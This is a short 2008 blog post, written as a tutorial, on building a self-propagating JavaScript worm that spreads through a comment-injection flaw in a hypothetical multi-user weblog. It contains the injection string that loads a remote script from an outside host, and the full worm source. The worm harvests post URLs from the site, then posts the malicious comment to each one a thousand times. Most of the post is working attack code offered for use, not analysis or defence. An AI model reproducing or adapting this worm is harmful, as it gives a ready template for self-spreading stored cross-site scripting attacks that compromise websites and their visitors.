lunes, 21 de abril de 2008

Super Lamer Javascript Worm

In this case we will discuss how to build the most basic JavaScript Worm exploiting a JavaScript injection.

First, you need to find a multi-user weblog system that is affected a JavaScript injection in the commentaries left by the visitors, we will call it www.truchilog.com. For example, when the visitor is leaving his name maybe he can input:

</a><script src=http://badpage.googlepages.com/j.js></script><a>

Injecting a small JavaScript script that invokes another arbitrary long script hosted in a free service like GooglePages. To use it's complete viral power the worm must infect new weblogs through new malformed commentaries on another weblogs.

You must notice that in JavaScript to view the result of a HTTP request it must be sent from the same domain. In this basic worm, the new victims are retrieved from the home page of the weblog system, i.e. '/'. The using a regular expressions we located in the home new weblogs or post in the system and proceed with a HTTP POST request to inject the viral payload into a comentary.

In this hypotetical example, the weblog posts detected has the form 'name.truchilog.com/post_number'. The complete code in j.js follows, notice that to be extra malicious the victims are infected 1000 times.

// generic function to start a http connection
// from JavaScript, is multibrowser
function init_conn() {
var success = false;
var xmlhttp; // Setup a variable.
try {
// This checks for alternate browsers
// such as Opera or Firefox
xmlhttp = new XMLHttpRequest();
success = true;
} catch (e) {
// Oops, not one of those. Try different
// IE implementations.
var XHR = new Array('MSXML2.XMLHTTP.5.0',
'MSXML2.XMLHTTP.4.0',
'MSXML2.XMLHTTP.3.0',
'MSXML2.XMLHTTP',
'Microsoft.XMLHTTP');

for (var i=0;i < XHR.length && !success; i++) {
try {
xmlhttp = new ActiveXObject(XHR[i]);
success = true;
} catch (e) {}
}
if (!success) {
// No XMLHttpRequest object? Is this 1990?
throw new Error('No XHR object');
}
}

return xmlhttp;
}


function infect(text) {

// harvest the user and post_num from the last posts.
var regexp = new RegExp('http://[a-z0-9_]+.truchilog.com/[0-9]+/','g');
var mymatch = text.match(regexp);

for (var i = 0; i < mymatch.length; i++) {

// var mymatch = myregexp.exec(text);
chain = new String(mymatch[i]);
pieces = chain.split ("/"); // el separador es el espacio

user = pieces[2].split(".")[0];
post_num = pieces[3]

// inject the the small javascript in
//the post using the name and post_num collected

// URI to send params to
var targetURI = "/commentaries.php?F="+user+"&P="+post_num;
var params = 'Name=%3C%2Fa%3E%3Cscript+src%3Dhttp%3A%2F%2F';
params += 'badpage.googlepages.com%2Fj.js%3E%3C%2Fscript%3E&';
params += 'Commentary=Hello_your_blog_was_infected&EMail=&';
params += 'URLPage=&x=65&y=4';
xmlhttp = init_conn();
//Open XHR and then set headers.
xmlhttp.open("POST", targetURI, true);
xmlhttp.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", params.length);
xmlhttp.setRequestHeader("Connection", "close");
//Send the parameters to the target.
xmlhttp.send(params);
}

}

// search for the last posts.

function p()
{
if(R.readyState==4)
{
var text = R.responseText;
// Setup a variable.
var xmlhttp;
// infect many times
for(i=0; i < 1000; i++) {
infect(text);
}
}
}

// start infection.
var R= init_conn();
R.onreadystatechange=p;
R.open('GET','/lastPosts.php',true);
R.send(null);



No hay comentarios:

Publicar un comentario